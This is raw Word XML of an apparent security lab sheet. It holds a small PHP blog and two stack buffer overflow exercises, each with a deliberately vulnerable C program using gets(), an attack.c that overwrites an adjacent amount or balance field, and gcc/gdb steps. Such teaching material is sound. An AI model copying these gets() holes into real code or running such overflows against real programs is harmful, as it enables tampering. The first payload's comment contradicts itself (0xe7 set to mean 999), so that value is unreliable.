          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FE015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&lt;!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DOCTYPE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html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4F844518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html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05B7DCA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head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0F58094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title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Simple Blogging Platform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title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15529193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head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1BA765C8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body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FF87807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h1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Simple Blogging Platform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h1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A21A498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</w:p>
    <w:p w14:paraId="77B44564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form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action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"submit.php"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method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"POST"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59D6F600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    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label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for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"title"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Title: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label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6A854C3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    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input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type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"text"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id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"title"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name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"title"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2C892DC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    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label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for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"content"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Content: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label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03B6C97B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    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textarea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id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"content"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name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"content"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&gt;&lt;/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textarea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165C3912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    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input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type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"submit"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value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"Submit"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6B0622A8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form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656C6CEF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</w:p>
    <w:p w14:paraId="0B9BE7DE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h2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All Blog Posts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h2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771AD75B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F44747"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>&lt;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?php include 'display.php'; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4C89A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body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2750903E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&lt;/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html</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="808080"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BA5B43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</w:p>
    <w:p w14:paraId="19E505DA" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306E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E5F0564" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306E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6480AF76" w14:textId="6C75A893" w:rsidR="008306EB" w:rsidRPr="008306EB" w:rsidRDefault="00FD4EC3" w:rsidP="008306EB">
      <w:pPr>
        <w:ind w:left="360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display</w:t>
      </w:r>
      <w:r w:rsidR="008306EB" w:rsidRPr="008306EB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.php-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1977E1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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E18E408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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>if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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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file_exists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'posts.txt'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)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0D2F6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$posts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file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'posts.txt'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, FILE_IGNORE_NEW_LINES);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9E8DB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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>foreach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(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$posts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as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$post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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6E9F4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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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list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$title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,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$content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) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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explode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'||'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,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$post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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A3207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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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echo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"&lt;h3&gt;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$title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&lt;/h3&gt;&lt;p&gt;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$content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&lt;/p&gt;&lt;hr&gt;"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162DD7BD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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA330A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} </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>else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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D450E7A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echo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"No posts available"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D49444D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECDF99E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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEDEC5A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</w:p>
    <w:p w14:paraId="40D251A8" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306E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8F9454C" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="00FD4EC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBA9A55" w14:textId="11492541" w:rsidR="008306EB" w:rsidRPr="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306EB">
      <w:pPr>
        <w:ind w:left="360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8306EB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00FD4EC3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ubmit</w:t>
      </w:r>
      <w:r w:rsidRPr="008306EB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.php-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7945890D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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA7A5DD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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>if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(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$_SERVER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'REQUEST_METHOD'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] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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==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'POST'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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69931016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$title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htmlspecialchars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$_POST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'title'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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DCFF1F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$content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htmlspecialchars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$_POST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[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'content'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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E342E04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</w:p>
    <w:p w14:paraId="72D61C8D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$data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$title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.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"||"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.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$content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.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 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</w:t>
      </w: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\n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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1249E8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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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file_put_contents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'posts.txt'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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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$data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, FILE_APPEND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA065A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C25F98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</w:p>
    <w:p w14:paraId="7BDA2D32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DCDCAA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>header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</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3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"Location: index.html"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04D557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C586C0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4EC3"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  <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6079664F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  <w:r w:rsidRPr="00FD4EC3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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56E0B5" w14:textId="77777777" w:rsidR="00FD4EC3" w:rsidRPr="00FD4EC3" w:rsidRDefault="00FD4EC3" w:rsidP="00FD4EC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000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val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8D7AA8" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306E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BACE1E1" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306E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36130758" w14:textId="77777777" w:rsidR="008306EB" w:rsidRDefault="008306EB" w:rsidP="008306E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000000C" w14:textId="77777777" w:rsidR="006771B7" w:rsidRPr="00427349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27349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a stack buffer overflow attack on the "Food Delivery” application using  a procedural language. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755800D1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(make folder on desktop-&gt;two-&gt;your_files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C244DB5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27C5F54B" w14:textId="77777777" w:rsidR="00CB2757" w:rsidRPr="00C9432F" w:rsidRDefault="00CB2757" w:rsidP="00CB2757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test</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C32177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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7C458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0AB717D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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694FF594" w14:textId="317B4036" w:rsidR="00CB2757" w:rsidRPr="00CB2757" w:rsidRDefault="008306EB" w:rsidP="008306E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</w:t>
      </w:r>
      <w:r w:rsidR="00CB2757" w:rsidRPr="00CB2757">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>typedef struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D29A6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C2D8746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 xml:space="preserve">    char customerName[10];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31839AF3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9AB717C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 xml:space="preserve">    int orderAmount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DC275C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12D53F4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>} Order;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E1B3F8" w14:textId="605B1A4D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2FA6A12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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC2023D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2BC3F162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 xml:space="preserve">    Order order;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA9A5C" w14:textId="7931E83A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 xml:space="preserve">    printf("Enter customer name (Max 10 characters): ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0927E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71002F6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 xml:space="preserve">    order.orderAmount = 50;  // Default order amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7730A1CB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C4E6059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 xml:space="preserve">    gets(order.customerName);  // Vulnerable function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBBE787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5D30D06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6ADE669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CA77F16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 xml:space="preserve">    printf("Thank you %s! Order Amount: $%d\n", order.customerName, order.orderAmount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586CFEBE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0C35C03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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875AC7E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1ADC3F1" w14:textId="77777777" w:rsidR="00CB2757" w:rsidRP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 w:rsidRPr="00CB2757">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56331063" w14:textId="77777777" w:rsidR="00CB2757" w:rsidRPr="00C9432F" w:rsidRDefault="00CB2757" w:rsidP="00CB2757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attack.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADCD391" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD22C9" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C734E" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992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2B803B99" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B2243" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Overflow the buffer and change the orderAmount to 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE61B3" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    printf("%s%c", "aaaaaaaaaaaa", '\xe7');  // Assuming 0xe7 is the value that sets orderAmount to 999 (0xe7 in hex is 231 in decimal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56BF28" w14:textId="77777777" w:rsidR="00924992" w:rsidRPr="00924992" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2937EE00" w14:textId="43F04509" w:rsidR="00CB2757" w:rsidRDefault="00924992" w:rsidP="00924992">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B23922" w14:textId="77777777" w:rsidR="00CB2757" w:rsidRDefault="00CB2757" w:rsidP="00924992">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D46C3F7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6ED8A2CF" w14:textId="77777777" w:rsidR="00CB2757" w:rsidRPr="00C9432F" w:rsidRDefault="00CB2757" w:rsidP="00CB2757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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAD55D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cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5708157E" w14:textId="50507D49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twelve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D7244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gcc -fno-stack-protector -o test test.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26857F55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gdb test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72B79E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break main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB1D23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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599A168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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1D684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disas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F6796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x/20xw $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D5B2F8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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3FA6E3" w14:textId="7A5A308D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(enter customer’s name more than max 10 characters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF247A8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p/x 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB3AECD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745E636" w14:textId="77777777" w:rsidR="00CB2757" w:rsidRPr="00C9432F" w:rsidRDefault="00CB2757" w:rsidP="00CB2757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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D6321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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0EE11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eight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9A611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gcc -o attack attack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94B43E" w14:textId="77777777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./attack | ./test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49D4FC" w14:textId="75D36EBC" w:rsidR="00CB2757" w:rsidRDefault="00CB2757" w:rsidP="00CB2757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2618F71E" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00427349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27349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement a stack buffer overflow attack “Financial Analysis Software" in a simulated environment using a procedural language, documenting each step of the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8DFAD2" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRDefault="00000000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427349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE17F6" w:rsidRPr="00427349">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (make folder on desktop-&gt;two-&gt;your_files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DC1211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39AE16D4" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00C9432F" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6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test</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB37CB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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5844DB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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B567042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E1D60A0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>typedef struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2810D35C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 xml:space="preserve">    char clientName[10];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28894637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 xml:space="preserve">    float balance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355784FF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>} Client;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995FC61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A001BF7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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D769F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 xml:space="preserve">    Client client;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC8BD3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C8D043C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 xml:space="preserve">    printf("Enter client name (Max 10 characters): ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8188A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 xml:space="preserve">    client.balance = 1000.0;  // Default balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B021617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 xml:space="preserve">    gets(client.clientName);  // Vulnerable function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A162D6C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FD9637E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 xml:space="preserve">    printf("Client: %s, Balance: $%.2f\n", client.clientName, client.balance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CAE21E" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRP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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77596B1C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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C7268F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1ACE39B8" w14:textId="3C6EFC05" w:rsidR="00AE17F6" w:rsidRPr="00C9432F" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6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attack.c-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E70C71" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr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>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D50EB6" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr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>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA236C8" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361C6841" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr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>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD85808" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr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 xml:space="preserve">    // Overflow the buffer and change the balance to 99999.99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6239D" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr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 xml:space="preserve">    printf("%s%s", "aaaaaaaaaaaa", "\xc2\x7d\x48\x46");  // This assumes we know the exact bytes to overflow and change the balance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E812FDA" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr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 xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D182643" w14:textId="1D1594AA" w:rsidR="00AE17F6" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE17F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280A3DE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C1B5915" w14:textId="77777777" w:rsidR="00AE17F6" w:rsidRPr="00C9432F" w:rsidRDefault="00AE17F6" w:rsidP="00AE17F6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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9432F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
